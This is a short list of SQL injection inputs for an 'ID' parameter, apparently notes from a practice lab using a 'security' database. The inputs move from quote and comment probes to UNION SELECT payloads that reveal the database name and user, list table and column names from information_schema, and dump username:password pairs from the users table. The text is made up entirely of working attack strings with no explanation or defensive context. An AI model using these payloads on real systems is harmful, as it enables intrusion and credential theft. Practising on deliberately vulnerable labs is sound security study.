ID:1
ID:1'
ID:1'-- 
ID:1"-- 
ID:1"union select 1,database(),user();-- 
ID:-1"union select 1,database(),user();-- 
ID:-1" union select 1,database(),user();-- 
ID:-1'
ID:-1') -- 
ID:-1') ;-- 
ID:-1') union select 1,database(),user();-- 
ID:-1') union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database();-- 
ID:-1') union select 1,database(),group_concat(column_name) from information_schema.columns where table_name=users;-- 
ID:-1') union select 1,database(),group_concat(column_name) from information_schema.columns where table_name="users";-- 
ID:-1') union select 1,database(),group_concat(username,":",password) from security.users;-- 
